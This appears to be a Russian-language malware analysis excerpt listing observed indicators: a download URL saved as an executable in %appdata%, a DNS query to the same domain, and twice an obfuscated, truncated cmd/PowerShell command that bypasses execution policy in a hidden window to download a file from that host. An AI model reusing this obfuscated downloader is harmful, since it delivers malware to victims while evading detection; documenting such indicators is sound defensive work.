Техническая информация
- http://transporingsytw.wang/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pO^we^r^sheLl.^ex^E -EXE^CuT^I^onpoliCy by^p^aSS -NOpRo^F^ILe ^-w^I^Ndows^T^Y^lE HIDD^En (new^-oB^JeCT sYstE^M.nET.^We^B^cLieN^t).dOW^N^loadF^ile(^'http://transporingsytw.wang/s...
- DNS ASK tr#####ringsytw.wang
- '<SYSTEM32>\cmd.exe' /c "pO^we^r^sheLl.^ex^E -EXE^CuT^I^onpoliCy by^p^aSS -NOpRo^F^ILe ^-w^I^Ndows^T^Y^lE HIDD^En (new^-oB^JeCT sYstE^M.nET.^We^B^cLieN^t).dOW^N^loadF^ile(^'http://transporingsytw.wang/s...' (со скрытым окном)